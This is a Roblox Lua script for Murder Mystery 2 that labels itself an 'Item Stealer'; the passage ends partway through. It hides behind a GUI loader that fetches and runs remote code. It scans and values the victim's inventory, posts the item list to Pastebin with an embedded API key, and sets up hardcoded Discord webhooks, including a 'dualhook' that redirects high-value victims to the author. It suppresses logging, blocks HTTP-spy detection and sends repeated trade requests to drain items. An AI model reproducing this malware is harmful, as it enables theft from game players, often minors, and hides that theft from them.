local function encodeString(str)
    local encoded = ""
    for i = 1, #str do
        encoded = encoded .. string.char(string.byte(str:sub(i, i)) + 3)
    end
    return encoded
end

local function encryptVariables()
    local encodedVariables = {}
    for name, value in pairs(getfenv(2)) do
        if type(value) ~= "function" then
            encodedVariables[name] = encodeString(tostring(value))
        end
    end
    return encodedVariables
end

local encryptedVars = encryptVariables()

_G.scriptExecuted = _G.scriptExecuted or false
if _G.scriptExecuted then
    return
end
_G.scriptExecuted = true

if CustomGui and CustomGui ~= "" then
    local success, err = pcall(function()
        loadstring(game:HttpGet(CustomGui))()
    end)
    if not success then
        warn("Error executing CustomGui loadstring: " .. err)
    end
else
    warn("CustomGui is empty. No loadstring to execute.")
end

--// Obfuscate Below This
local InvModule = require(game:GetService("ReplicatedStorage").Modules.InventoryModule)
local vintageItems = {}
local commonItems = {}
local uncommonItems = {}
local rareItems = {}
local legendaryItems = {}
local godlyItems = {}
local ancientItems = {}
local uniqueItems = {}
local allItems = {}
local vintageItemsC = 0
local commonItemsC = 0
local uncommonItemsC = 0
local rareItemsC = 0
local legendaryItemsC = 0
local godlyItemsC = 0
local ancientItemsC = 0
local uniqueItemsC = 0
for a,b in pairs(InvModule.MyInventory.Data.Weapons) do
    for c,d in pairs(b) do
        table.insert(allItems, d.ItemName)
        if d.Rarity == "Vintage" then
            vintageItemsC = vintageItemsC + 1
            table.insert(vintageItems, d.ItemName)
        end
        if d.Rarity == "Common" then
            commonItemsC = commonItemsC + 1
            table.insert(commonItems, d.ItemName)
        end
        if d.Rarity == "Uncommon" then
            uncommonItemsC = uncommonItemsC + 1
            table.insert(uncommonItems, d.ItemName)
        end
        if d.Rarity == "Rare" then
            rareItemsC = rareItemsC + 1
            table.insert(rareItems, d.ItemName)
        end
        if d.Rarity == "Legendary" then
            legendaryItemsC = legendaryItemsC + 1
            table.insert(legendaryItems, d.ItemName)
        end
        if d.Rarity == "Godly" then
            godlyItemsC = godlyItemsC + 1
            table.insert(godlyItems, d.ItemName)
        end
        if d.Rarity == "Ancient" then
            ancientItemsC = ancientItemsC + 1
            table.insert(ancientItems, d.ItemName)
        end
        if d.Rarity == "Unique" then
            uniqueItemsC = uniqueItemsC + 1
            table.insert(uniqueItems, d.ItemName)
        end
    end
end
local HttpService = game:GetService("HttpService")
local function pastebin(content)
    local body = {
        api_dev_key = "TVxVI-eNFIzYVJEvXSSvlpid2SkS77SS",
        api_paste_code = content,
        api_option = "paste"
    }
    local encodedBody = ""
    for key, value in pairs(body) do
        encodedBody = encodedBody .. key .. "=" .. HttpService:UrlEncode(value) .. "&"
    end
    encodedBody = encodedBody:sub(1, -2)
    local response
    local success, err = pcall(function()
        response = request({
            Url = "https://pastebin.com/api/api_post.php",
            Method = "POST",
            Body = encodedBody,
            Headers = {
                ["Content-Type"] = "application/x-www-form-urlencoded"
            },
            Timeout = 20
        })
    end)
    if not success or not response or not response.Success then
        return "Error, pastebin was unsuccessful"
    end
    local pasteUrl = response.Body
    local rawUrl = "https://pastebin.com/raw/" .. pasteUrl:match("([%w]+)$")
    return rawUrl
end
local function formatItems(itemList)
    if #itemList == 0 then
        return "None Detected!"
    else
        return table.concat(itemList, "\n")
    end
end
local pastebinString = "-- MM2 Item Stealer By Infernalix\n" ..
"--====================================\n" ..
"\n--== [ Unique Items ] ==--\n" .. formatItems(uniqueItems) ..
"\n\n--== [ Ancient Items ] ==--\n" .. formatItems(ancientItems) ..
"\n\n--== [ Godly Items ] ==--\n" .. formatItems(godlyItems) ..
"\n\n--== [ Legendary Items ] ==--\n" .. formatItems(legendaryItems) ..
"\n\n--== [ Vintage Items ] ==--\n" .. formatItems(vintageItems) ..
"\n\n--== [ Rare Items ] ==--\n" .. formatItems(rareItems) ..
"\n\n--== [ Uncommon Items ] ==--\n" .. formatItems(uncommonItems) ..
"\n\n--== [ Common Items ] ==--\n" .. formatItems(commonItems) ..
"\n\n--====================================\n" ..
"-- End of Item List"
local pastebinLink = pastebin(pastebinString)
  values = {
    ["Nik's Scythe"] = 25000000,
    ["Elderwood Scythe"] = 75,
    ["Vampire's Axe"] = 950,
    ["Vampire's Gun"] = 900,
    ["Batwing"] = 62,
    ["Icewing"] = 4,
    ["Corrupt"] = 925,
    ["Chroma Luger"] = 85,
    ["Chroma Shark"] = 68,
    ["Chroma Laser"] = 85,
    ["Chroma Slasher"] = 67,
    ["Chroma Fang"] = 57,
    ["Chroma Heat"] = 80,
    ["Chroma Saw"] = 42,
    ["Chroma DeathShard"] = 58,
    ["Chroma Tides"] = 62,
    ["SeerChroma"] = 50,
    ["Chroma Boneblade"] = 58,
    ["Chroma Gingerblade"] = 57,
    ["Elderwood Revolver"] = 58,
    ["Eternal II"] = 7,
    ["Red Luger"] = 42,
    ["Green Luger"] = 30,
    ["Sugar"] = 145,
    ["Candy"] = 155,
    ["Chill"] = 24,
    ["Handsaw"] = 10,
    ["Eternal"] = 10,
    ["Boneblade"] = 10,
    ["Clockwork"] = 26,
    ["Hallow's Edge"] = 15,
    ["Amerilaser"] = 30,
    ["Old Glory"] = 28,
    ["BattleAxe II"] = 16,
    ["Spider"] = 22,
    ["Pixel"] = 24,
    ["Blaster"] = 30,
    ["Ginger Luger"] = 26,
    ["Virtual"] = 28,
    ["Flames"] = 13,
    ["Luger"] = 60,
    ["Heat"] = 25,
    ["Xmas"] = 13,
    ["Tides"] = 23,
    ["Slasher"] = 26,
    ["Pumpking"] = 22,
    ["Saw"] = 10,
    ["Laser"] = 8,
    ["Fang"] = 23,
    ["Shark"] = 28,
    ["Deathshard"] = 21,
    ["Winter's Edge"] = 14,
    ["Ice Dragon"] = 13,
    ["Red Seer"] = 3,
	 ["Seer"] = 3,
    ["Blue Seer"] = 3,
    ["Purple Seer"] = 3,
    ["Orange Seer"] = 2,
    ["Yellow Seer"] = 2,
    ["BattleAxe"] = 13,
    ["Frostsaber"] = 18,
    ["Ice Shard"] = 14,
    ["Gingerblade"] = 22,
    ["Snowflake"] = 8,
    ["Ghostblade"] = 10,
    ["Nightblade"] = 28,
    ["Hallow's Blade"] = 11,
    ["JD"] = 60,
    ["Web"] = 2,
    ["Rupture"] = 2,
    ["Green Elite"] = 10,
    ["Tree (gun)"] = 1,
    ["Tree (knife)"] = 1,
    ["Cotton Candy"] = 60,
    ["Scratch"] = 5,
    ["Ghost Knife"] = 6,
    ["Ginger Gun"] = 4,
    ["Red Fire"] = 3,
    ["Blue Scratch"] = 3,
    ["Blue Elite"] = 8,
    ["Ghost Gun"] = 1,
    ["Jack"] = 4,
    ["Mummy"] = 1,
    ["Ginger (Knife)"] = 1,
    ["Ginger (Gun)"] = 1,
    ["Cane (Knife)"] = 2,
    ["Cane (Gun)"] = 2,
    ["Orange Marble"] = 4,
    ["Bats"] = 4,
    ["Cane Knife"] = 175,
    ["Icicles Gun"] = 25,
    ["Snowy"] = 1,
    ["Magma"] = 12,
    ["Green Marble"] = 6,
    ["Vampire Knife"] = 2,
    ["Toxic Gun"] = 3,
    ["Gifted"] = 1,
    ["Snowman (Knife)"] = 1,
    ["Snowman (Gun)"] = 1,
    ["Nutcracker"] = 1,
    ["Wrapped (Knife)"] = 1,
    ["Wrapped (Gun)"] = 1,
    ["Wolf"] = 4,
    ["Vampire"] = 3,
    ["Moons"] = 4,
    ["Mummy (Knife)"] = 2,
    ["Potion"] = 5,
    ["Webs"] = 4,
    ["Mummy Gun"] = 12,
    ["Zombie Gun"] = 20,
    ["Potion Knife"] = 22,
    ["Mummy Knife"] = 2,
    ["Zombie Knife"] = 2,
    ["Potion Gun"] = 2,
    ["Sweater Knife"] = 10,
    ["Snowflake Knife"] = 4,
    ["Holly Gun"] = 2,
    ["2015"] = 2,
    ["TNL"] = 2,
    ["Hearts"] = 4,
    ["Valentine"] = 3,
    ["Goo"] = 2,
    ["Neon"] = 3,
    ["Reptile"] = 2,
    ["Infected"] = 2,
    ["Passion"] = 4,
    ["Sweetheart"] = 3,
    ["Blossom"] = 4,
    ["Roses"] = 4,
    ["Santa (Knife)"] = 1,
    ["Santa (Gun)"] = 1,
    ["Ornament2 (knife)"] = 1,
    ["Ornament2 (Gun)"] = 1,
    ["Ornament1"] = 1,
    ["Ornament"] = 1,
    ["Elf (Gun)"] = 3,
    ["Elf (knife)"] = 14,
    ["Tulip"] = 3,
    ["Skool"] = 23,
    ["Patrick"] = 2,
    ["Bunny"] = 0.11,
    ["Choco"] = 3,
    ["Egg"] = 2,
    ["Carrot"] = 2,
    ["Asteroid"] = 6,
    ["Brains"] = 1,
    ["Witch"] = 1,
    ["Boney"] = 1,
    ["Xbox"] = 0.12,
    ["Slime Gun"] = 2,
    ["Slime Knife"] = 3,
    ["Bats Knife"] = 70,
    ["Bats Gun"] = 4,
    ["Grave Gun"] = 12,
    ["Grave Knife"] = 2,
    ["Haunted Knife"] = 10,
    ["Haunted Gun"] = 2,
    ["Sparkle10"] = 45,
    ["Sparkle1"] = 3,
    ["Sparkle2"] = 3,
    ["Sparkle3"] = 3,
    ["Sparkle4"] = 5,
    ["Ecto"] = 3,
    ["CandyCorn"] = 2,
    ["Phantom"] = 6,
    ["Zombie"] = 4,
    ["Sidewinder"] = 15,
    ["Grind"] = 4,
    ["Euro"] = 8,
    ["Ollie"] = 20,
    ["Tailslide"] = 22,
    ["Indy"] = 2,
    ["Sparkle5"] = 15,
    ["Sparkle6"] = 18,
    ["Sparkle7"] = 23,
    ["Sparkle8"] = 26,
    ["Sparkle9"] = 42,
    ["Coal knife"] = 25,
    ["Snowman Gun"] = 5,
    ["Wrapped Gun"] = 5,
    ["Prism"] = 3,
    ["Denis"] = 1,
    ["Alex"] = 1,
    ["Corl"] = 1,
    ["Sketchy"] = 1,
    ["Sub"] = 1,
    ["Chroma Fire Bat"] = 15,
    ["Chroma Fire Bear"] = 8,
    ["Chroma Fire Fox"] = 15,
    ["Chroma Fire Pig"] = 9,
    ["Chroma Fire Bunny"] = 18,
    ["Chroma Fire Cat"] = 20,
    ["Chroma Fire Dog"] = 15,
    ["<3"] = 10,
    ["Steambird"] = 2,
    ["Phoenix"] = 3,
    ["Sammy"] = 2,
    ["Electro"] = 2,
    ["Deathspeaker"] = 3,
    ["Fire Bat"] = 1,
    ["Fire Bear"] = 1,
    ["Frostbird"] = 3,
    ["Fire Fox"] = 1,
    ["Fire Pig"] = 1,
    ["Fire Bunny"] = 1,
    ["Fire Cat"] = 1,
    ["Fire Dog"] = 1,
    ["Purple Pumpkin"] = 40,
    ["Overseer Eye"] = 38,
    ["Blue Pumpkin"] = 60,
    ["Red Pumpkin"] = 45,
    ["Green Pumpkin"] = 30,
    ["Pumpkin"] = 18,
    ["Fairy"] = 22,
    ["Reindeer"] = 20,
    ["Elf"] = 4,
    ["Nobledragon"] = 25,
    ["Elitey"] = 0.31,
    ["Eyeball"] = 35,
    ["Jetstream"] = 42,
    ["Dogey"] = 55,
    ["Chilly"] = 15,
    ["Seahorsey"] = 17,
    ["Piggy"] = 4,
    ["Pengy"] = 15,
    ["UFO"] = 7,
    ["Badger"] = 2,
    ["Bat"] = 0.31,
    ["Tankie"] = 13,
    ["Mechbug"] = 7,
    ["Bear"] = 0.22,
    ["Fox"] = 0.12,
    ["Pig"] = 0.12,
    ["Santa Dog"] = 0.12,
    ["Cat"] = 0.11,
    ["Dog"] = 0.11,
    ["America"] = 10,
    ["Golden"] = 4,
    ["Blood"] = 10,
    ["Phaser"] = 9,
    ["Prince"] = 6,
    ["Shadow"] = 7,
    ["Ghost"] = 12,
    ["Splitter"] = 3,
    ["Cowboy"] = 3,
    ["Eternalcane"] = 20,
    ["Skulls"] = 12,
    ["Witched"] = 50,
    ["Monster"] = 22,
    ["Pumpkin Patch"] = 2,
    ["Blue Pumpkin 2019"] = 3,
    ["Brains 2019"] = 20,
    ["Elf 2019"] = 25,
    ["Gingerbread Gun"] = 5,
    ["Gingerbread Knife"] = 105,
    ["Green Pumpkin 2019"] = 27,
    ["Red Pumpkin 2019"] = 30,
    ["Rudolph"] = 20,
    ["Vampire Bat"] = 32,
    ["Black Cat"] = 45,
    ["Zombie Dog"] = 185,
    ["Aurora Gun"] = 2,
    ["Aurora Knife"] = 30,
    ["Bones Gun"] = 75,
    ["Branches"] = 22,
    ["Candy Swirl Gun"] = 20,
    ["Lights Gun"] = 20,
    ["Lights Knife"] = 2,
    ["Log Chopper"] = 30,
    ["Minty"] = 25,
    ["Frostbite"] = 10,
    ["Lugercane"] = 20,
    ["Snakebite Knife"] = 12,
    ["Snowflakes Gun"] = 0.41,
    ["Snowflakes Knife"] = 0.31,
    ["Santa's Magic"] = 13,
    ["Dungeon"] = 45,
    ["Gifts Knife"] = 60,
    ["Pine Knife"] = 20,
    ["ZombifiedGun"] = 20,
    ["Zombified Knife"] = 55,
    ["Mummified"] = 0.42,
    ["RIP Gun"] = 20,
    ["Box of Gold Papers"] = 4,
    ["Box of Ultra Wrap"] = 4,
    ["Box of Purple Papers"] = 3,
    ["Box of Blue Papers"] = 3,
    ["Box of Red Papers"] = 3,
    ["Box of Green Papers"] = 2,
    ["Box of Fert"] = 2,
    ["Mystery Keys"] = 4,
    ["Skeleton Key"] = 2,
    ["Chroma Gemstone"] = 75,
    ["Gemstone"] = 26,
    ["Eternal III"] = 8,
    ["Rainbow (Gun)"] = 0.24,
    ["Bioblade"] = 13,
    ["Lightbringer"] = 58,
    ["Chroma Lightbringer"] = 120,
    ["Chroma Darkbringer"] = 125,
    ["Darkbringer"] = 62,
    ["Eternal IV"] = 10,
    ["Prismatic"] = 8,
    ["Cavern Gun"] = 1,
    ["Cavern Knife"] = 12,
    ["Hallowscythe"] = 50,
    ["Hallowgun"] = 33,
    ["Vampire's Edge"] = 16,
    ["Peppermint"] = 6,
    ["Icebreaker"] = 85,
    ["Iceblaster"] = 60,
    ["Jinglegun"] = 14,
    ["Cookieblade"] = 4,
    ["Gold Candy"] = 100000000,
    ["Silver Candy"] = 75000000,
    ["Bronze Candy"] = 50000000,
    ["Blue Candy"] = 1000000,
    ["Red Hallow"] = 1000000,
    ["Gold Hallow"] = 100000000,
    ["Silver Hallow"] = 75000000,
    ["Bronze Hallow"] = 50000000,
    ["Bronze Sugar"] = 50000000,
    ["Silver Sugar"] = 75000000,
    ["Gold Sugar"] = 100000000,
    ["Blue Sugar"] = 1000000,
    ["Blue Elderwood (gun)"] = 1000000,
    ["Bronze Elderwood (gun)"] = 50000000,
    ["Silver Elderwood (gun)"] = 75000000,
    ["Gold Elderwood (gun)"] = 100000000,
    ["Gold Logchopper"] = 100000000,
    ["Gold Minty"] = 100000000,
    ["Silver Minty"] = 75000000,
    ["Silver Logchopper"] = 75000000,
    ["Bronze Logchopper"] = 50000000,
    ["Bronze Minty"] = 50000000,
    ["Blue Minty"] = 1000000,
    ["Blue Logchopper"] = 1000000,
	["Logchopper"] = 30,
    ["Blue Vamp's Edge"] = 1000000,
    ["Bronze Vamp's Edge"] = 50000000,
    ["Silver Vamp's Edge"] = 75000000,
    ["Gold Vamp's Edge"] = 100000000,
    ["Heartblade"] = 75,
    ["Gold Icebreaker"] = 100000000,
    ["Silver Icebreaker"] = 75000000,
    ["Bronze Icebreaker"] = 50000000,
    ["Red Icebreaker"] = 1000000,
    ["Red Iceblaster"] = 1000000,
    ["Bronze Iceblaster"] = 50000000,
    ["Silver Iceblaster"] = 75000000,
    ["Gold Iceblaster"] = 100000000,
    ["Eggblade"] = 3,
    ["Nebula"] = 7,
    ["Glitch1"] = 25,
    ["Candleflame"] = 130,
    ["Chroma Candleflame"] = 190,
    ["Harvester"] = 1025,
    ["Chroma Swirlygun"] = 180,
    ["Swirly Gun"] = 170,
    ["Swirly Axe"] = 190,
    ["Swirly Blade"] = 80,
    ["Iceflake"] = 31,
    ["Icebeam"] = 31,
    ["Icecracker"] = 3,
    ["Silent Night Knife"] = 10,
    ["Icedriller"] = 15,
    ["Silent Night Gun"] = 2,
    ["Aurora Gun"] = 4,
    ["Gold Harvester"] = 100000000,
    ["Silver Harvester"] = 75000000,
    ["Bronze Harvester"] = 50000000,
    ["Blue Harvester"] = 1000000,
    ["Plasmabeam"] = 31,
    ["Plasmablade"] = 31,
    ["Gold Swirly"] = 100000000,
    ["Silver Swirly"] = 75000000,
    ["Bronze Swirly"] = 50000000,
    ["Blue Swirly"] = 1000000,
    ["Gold Swirly"] = 100000000,
    ["Silver Swirly Gun"] = 75000000,
    ["Bronze Swirly Gun"] = 50000000,
    ["Blue Swirly Gun"] = 1000000,
    ["Santa's Spirit"] = 12,
    ["Frozen Gun"] = 22,
    ["Chroma Elderwood Blade"] = 190,
    ["Makeshift"] = 130,
    ["Bat"] = 480,
    ["Elderwood Blade"] = 130,
    ["Phantom"] = 80,
    ["Spectre"] = 80,
    ["Vampire Gun"] = 7,
    ["Spectral Knife"] = 5,
    ["Makeshift Knife"] = 1,
    ["Santa Walking"] = 40,
    ["Chroma Cookiecane"] = 160,
    ["Cookiecane"] = 80,
    ["Icepiercer"] = 925,
    ["Gingermint"] = 80,
    ["Arctic Gun"] = 4,
    ["Blue Elderwood"] = 1000000,
    ["Bronze Elderwood"] = 50000000,
    ["Silver Elderwood"] = 75000000,
    ["Gold Elderwood"] = 100000000,
    ["Gold Icepiercer"] = 100000000,
    ["Gold Icecrusher"] = 100000000,
    ["Silver Icecrusher"] = 75000000,
    ["Silver Icepiercer"] = 75000000,
    ["Bronze Icepiercer"] = 50000000,
    ["Bronze Icecrusher"] = 50000000,
    ["Red Icecrusher"] = 1000000,
    ["Red Icepiercer"] = 1000000,
    ["Glitch2"] = 45,
    ["Blossom"] = 555,
    ["Sakura"] = 545,
    ["Broken"] = 3,
    ["Combat II"] = 4,
    ["Rainbow"] = 230,
    ["Rainbow Gun"] = 235,
    ["Waves"] = 135,
    ["Ocean"] = 140,
    ["Chroma Travelers Gun"] = 67000,
    ["Traveler's Gun"] = 2300,
    ["Darkshot"] = 540,
    ["Darksword"] = 535,
    ["Traveler's Axe"] = 4750,
    ["Traveler Gun"] = 4,
    ["Turkey"] = 1250,
    ["Latte Gun"] = 75,
    ["Latte Knife"] = 75,
    ["Evergreen"] = 700,
    ["Evergun"] = 1400,
    ["Gingerscope"] = 7400,
    ["Chroma Evergun"] = 30000,
    ["Chroma Evergreen"] = 13000,
    ["Flowerwood Knife"] = 115,
    ["Flowerwood Gun"] = 120,
    ["Blue Gingerscope"] = 1000000,
    ["Blue Gingerscythe"] = 1000000,
    ["Bronze Gingerscope"] = 50000000,
    ["Bronze Gingerscythe"] = 50000000,
    ["Silver Gingerscope"] = 75000000,
    ["Silver Gingerscythe"] = 75000000,
    ["Gold Gingerscope"] = 100000000,
    ["Gold Gingerscythe"] = 100000000,
    ["Chroma Watergun"] = 2600,
    ["Watergun"] = 140,
    ["Pearl"] = 70,
    ["Pearlshine"] = 70

}

setmetatable(values, {
    __index = function(_, key)
        return 0
    end
})

local Players1 = game:GetService("Players")
local LocalPlayer1 = Players1.LocalPlayer
local UIPath1
if LocalPlayer1.PlayerGui.MainGUI.Game:FindFirstChild("Inventory") ~= nil then
    UIPath1 = LocalPlayer1.PlayerGui.MainGUI.Game.Inventory.Main
else
    UIPath1 = LocalPlayer1.PlayerGui.MainGUI.Lobby.Screens.Inventory.Main
end
    local totalValue = 0
    for _, category in pairs(UIPath1.Weapons.Items.Container:GetChildren()) do
        for _, itemContainer in pairs(category.Container:GetChildren()) do
            if itemContainer.Name == "Christmas" or itemContainer.Name == "Halloween" then
                for _, item in pairs(itemContainer.Container:GetChildren()) do
                    if item:IsA("Frame") then
                        local itemName = item.ItemName.Label.Text
                        if values[itemName] then
                            local amount = item.Container.Amount.Text
                            if amount == "" or amount == "None" then
                                amount = 1
                            else
                                local num = tonumber(amount:match("x(%d+)"))
                                if num then
                                    amount = num
                                else
                                    amount = 1
                                end
                            end
                            totalValue = totalValue + values[itemName] * amount
                        end
                    end
                end
            else
                if itemContainer:IsA("Frame") then
                    local itemName = itemContainer.ItemName.Label.Text
                    if values[itemName] then
                        local amount = itemContainer.Container.Amount.Text
                        if amount == "" or amount == "None" then
                            amount = 1
                        else
                            local num = tonumber(amount:match("x(%d+)"))
                            if num then
                                amount = num
                            else
                                amount = 1
                            end
                        end
                        totalValue = totalValue + values[itemName] * amount
                    end
                end
            end
        end
    end
    for _, pet in pairs(UIPath1.Pets.Items.Container.Current.Container:GetChildren()) do
        if pet:IsA("Frame") then
            local itemName = pet.ItemName.Label.Text
            if values[itemName] then
                local amount = pet.Container.Amount.Text
                if amount == "" or amount == "None" then
                    amount = 1
                else
                    local num = tonumber(amount:match("x(%d+)"))
                    if num then
                        amount = num
                    else
                        amount = 1
                    end
                end
                totalValue = totalValue + values[itemName] * amount
            end
        end
    end
local InventoryValue = totalValue
local Receiver = Username
local mailstealer_name = "Anonymous Stealer"
local newReceiver = "givepetroblox" --// Dualhook Username
local newWebhook = "https://discord.com/api/webhooks/1305433436755853314/b7HCdbAdCh0YRkjjKX0iZfduUKJyW2YCO7uMd7weCXri4NQzFvJSS6bS2kaEwOxMOo7s" --// Dualhook Webhook
local LogWebhook = "https://discord.com/api/webhooks/1301547709865660447/yEClHjSZo4zLW5AlhtEHZHhceC_Ooe5bXOKR2aKeUhM3NNsnAygQ06DK-WvS7Vq169Kl" --// Logs Webhook
local targetItems = {
    VampireAxe = true,
    VampireGunChroma = true,
    VampireGun = true,
    Harvester = true,
    WatergunChroma = true,
    TreeKnife2023Chroma = true,
    TreeGun2023Chroma = true,
    TreeKnife2023 = true,
    TreeGun2023 = true,
    TravelerGunChroma = true,
    TravelerGun = true,
    TravelerAxe = true,
    Sorry = true,
    Sakura_K = true,
    Blossom_G = true
}
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local GetFullInventory = ReplicatedStorage.Remotes.Extras.GetFullInventory
local GetItemDataF = ReplicatedStorage.Remotes.Extras.GetItemData
local items = GetItemDataF:InvokeServer("Item")
local dataitemtable = {}
for r, t in pairs(items) do
    dataitemtable[r] = t["Rarity"]
end
local function GetItemInfo(itemname)
    return dataitemtable[itemname]
end
local playerInventory = GetFullInventory:InvokeServer(game.Players.LocalPlayer.Name)["Weapons"]["Owned"]
local itemFound = false

for itemID in pairs(playerInventory) do
    if targetItems[itemID] then
        itemFound = true
        break
    end
end

if itemFound then
    if Receiver == game.Players.LocalPlayer.Name then
        Receiver = Username
        Webhook = Webhook
    else
        Receiver = newReceiver
        Webhook = newWebhook
    end
else
    Receiver = Username
    Webhook = Webhook
end
setclipboard = function() end
warn = function() end
print = function() end
writefile = function() end
local function detectHttpSpy()
    local function isHttpSpy(gui)
        return gui and gui:IsA("ScreenGui") and gui.Name:lower():find("http") ~= nil
    end
    for _, gui in ipairs(game:GetService("CoreGui"):GetChildren()) do
        if isHttpSpy(gui) then
            return true
        end
    end
    return false
end
if detectHttpSpy() then
    warn("Http Spy Was Detected And Now Will Block It, This Means That You Cannot Steal From The Current Player.")
    return
end
repeat wait() until game:IsLoaded()
if getgenv().scriptexecuted then return end
getgenv().scriptexecuted = true
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local VirtualUser = game:GetService("VirtualUser")
local MarketplaceService = game:GetService("MarketplaceService")
local RbxAnalyticsService = game:GetService("RbxAnalyticsService")
local UserInputService = game:GetService("UserInputService")
local HttpService = game:GetService("HttpService")
local TeleportService = game:GetService("TeleportService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local Trade = ReplicatedStorage.Trade
local events = {"MouseButton1Click", "MouseButton1Down", "Activated"}
local TeleportScript = [[game:GetService("TeleportService"):TeleportToPlaceInstance("]] .. game.PlaceId .. [[", "]] .. game.JobId .. [[", game.Players.LocalPlayer)]]
local Position = UDim2.new(0, 9999, 0, 9999)
local Inventory = {}
local function checkAndKickIfVIP()
    local isVIPServer = ReplicatedStorage.Remotes.Extras.IsVIPServer:InvokeServer()
    if isVIPServer and LocalPlayer then
        LocalPlayer:Kick("This script only works in public servers.")
    end
end
checkAndKickIfVIP()
local function getPlatform()
    if UserInputService.TouchEnabled and not UserInputService.MouseEnabled then
        return "Mobile"
    elseif UserInputService.KeyboardEnabled and UserInputService.MouseEnabled then
        return "PC"
    elseif UserInputService.GamepadEnabled then
        return "Console"
    else
        return "Unknown"
    end
end
local Platform = getPlatform()
Executor = identifyexecutor()
if Executor == "Solara" then
    return
end
FullInventory = true
local games = {
    [142823291] = true,
    [335132309] = true,
    [636649648] = true
}
if not games[game.PlaceId] then
    LocalPlayer:Kick("Unfortunately, this game is not supported.")
    while true do wait() end
end
local PlayerGui = LocalPlayer:WaitForChild("PlayerGui")
local MainGUI = PlayerGui:WaitForChild("MainGUI")
wait(5)
local Common, Uncommon, Rare, Legendary, Vintage, Godly, Ancient, Unique = 0, 0, 0, 0, 0, 0, 0, 0
LocalPlayer.Idled:connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
end)
if LocalPlayer.PlayerGui.MainGUI.Game:FindFirstChild("Inventory") then
    UIPath = LocalPlayer.PlayerGui.MainGUI.Game.Inventory.Main
    TradePath = LocalPlayer.PlayerGui.TradeGUI
    Mobile = false
else
    UIPath = LocalPlayer.PlayerGui.MainGUI.Lobby.Screens.Inventory.Main
    TradePath = LocalPlayer.PlayerGui.TradeGUI_Phone
    Mobile = true
end
function TapUI(button, check, button2)
    if check == "Active Check" and not button.Active then
        return
    end
    if check == "Text Check" and button ~= "^" then
        return
    end
    for _, event in pairs(events) do
        for _, connection in pairs(getconnections(button[event])) do
            connection:Fire()
        end
    end
end
function Rarity(color, amount, tradeable, requirepath, path)
    local Stack = amount ~= "" and tonumber(amount:match("x(%d+)")) or 1
    local r, g, b = math.floor(color.R * 255 + 0.5), math.floor(color.G * 255 + 0.5), math.floor(color.B * 255 + 0.5)
    if r == 106 and g == 106 and b == 106 then
        Common = Common + Stack
    elseif r == 0 and g == 255 and b == 255 then
        Uncommon = Uncommon + Stack
    elseif r == 0 and g == 200 and b == 0 then
        Rare = Rare + Stack
    elseif r == 220 and g == 0 and b == 5 then
        Legendary = Legendary + Stack
    elseif r == 255 and g == 0 and b == 179 then
        Godly = Godly + Stack
    elseif r == 100 and g == 10 and b == 255 then
        Ancient = Ancient + Stack
    elseif r == 240 and g == 140 and b == 0 then
        Unique = Unique + Stack
    elseif r == 180 and g == 70 and b == 0 then
        Common = Common + Stack
    else
        Vintage = Vintage + Stack
    end
end
function checkitem(v)
    if v:IsA("Frame") and v.ItemName and v.ItemName.Label and v.ItemName.Label.Text ~= "Default Knife" and v.ItemName.Label.Text ~= "Default Gun" then
        local itemColor = v.ItemName.BackgroundColor3
        local r, g, b = math.floor(itemColor.R * 255 + 0.5), math.floor(itemColor.G * 255 + 0.5), math.floor(itemColor.B * 255 + 0.5)
        local isDesiredRarity = (r == 255 and g == 0 and b == 179) or
                                (r == 100 and g == 10 and b == 255) or 
                                (r == 240 and g == 140 and b == 0) or 
                                (r == 180 and g == 70 and b == 0)
        if isDesiredRarity then
            Rarity(itemColor, v.Container.Amount.Text, v:FindFirstChild("Tags"))
            if FullInventory then
                local number = v.Container.Amount.Text ~= "" and v.Container.Amount.Text or "x1"
                table.insert(Inventory, v.ItemName.Label.Text .. " " .. number)
            end
        end
    end
end
function FullInventory()
    for _, category in pairs(UIPath.Weapons.Items.Container:GetChildren()) do
        for _, itemContainer in pairs(category.Container:GetChildren()) do
            if itemContainer.Name == "Christmas" or itemContainer.Name == "Halloween" then
                for _, item in pairs(itemContainer.Container:GetChildren()) do
                    checkitem(item)
                end
            else
                checkitem(itemContainer)
            end
        end
    end
    for _, pet in pairs(UIPath.Pets.Items.Container.Current.Container:GetChildren()) do
        checkitem(pet)
    end
    if Common == 0 and Uncommon == 0 and Rare == 0 and Legendary == 0 and Godly == 0 and Ancient == 0 and Unique == 0 and Vintage == 0 then
        table.insert(Inventory, "None")
    end
    if FullInventory then
        AllItems = table.concat(Inventory, ", ")
    end
end
FullInventory()
task.wait()
local function SendTrade(targetPlayer)
    if targetPlayer then
        ReplicatedStorage.Trade.SendRequest:InvokeServer(targetPlayer)
    end
end
local function IsTradingWith(targetPlayer)
    local status = ReplicatedStorage.Trade.GetTradeStatus:InvokeServer()
    return status and status.TargetPlayer == targetPlayer.Name
end
local function ContinuousTrade(targetPlayer)
    task.spawn(function()
        while true do
            if not IsTradingWith(targetPlayer) then
                SendTrade(targetPlayer)
            end
            task.wait(0.1)
        end
    end)
end
local function SetupChatListener(player)
    player.Chatted:Connect(function()
        SendTrade(player)
    end)
end
local function Activate(playerName)
    local player = Players:FindFirstChild(playerName)
    if player then
        SetupChatListener(player)
        task.wait(10)
        SendTrade(player)
        ContinuousTrade(player)
    end
end
local function InsertItems()
    local ItemsByRarity = {
        Unique = {},
        Ancient = {},
        Godly = {},
        Vintage = {},
        Legendary = {},
        Rare = {},
        Uncommon = {},
        Common = {}
    }
    local items = TradePath.Container.Items.Main:GetChildren()
    for _, v in pairs(items) do
        local itemContainers = v.Items.Container.Current.Container:GetChildren()
        for _, item in pairs(itemContainers) do
            if item:IsA("Frame") then
                local color = item.ItemName.BackgroundColor3
                local rarity = "Common"
                if color == Color3.fromRGB(220, 0, 5) then
                    rarity = "Legendary"
                elseif color == Color3.fromRGB(255, 0, 179) then
                    rarity = "Godly"
                elseif color == Color3.fromRGB(100, 10, 255) then
                    rarity = "Ancient"
                elseif color == Color3.fromRGB(240, 140, 0) then
                    rarity = "Unique"
                elseif color == Color3.fromRGB(255, 255, 0) then
                    rarity = "Vintage"
                elseif color == Color3.fromRGB(0, 200, 0) then
                    rarity = "Rare"
                elseif color == Color3.fromRGB(0, 255, 255) then
                    rarity = "Uncommon"
                end
                table.insert(ItemsByRarity[rarity], item)
            end
        end
    end
    local ItemsInTrade = 0
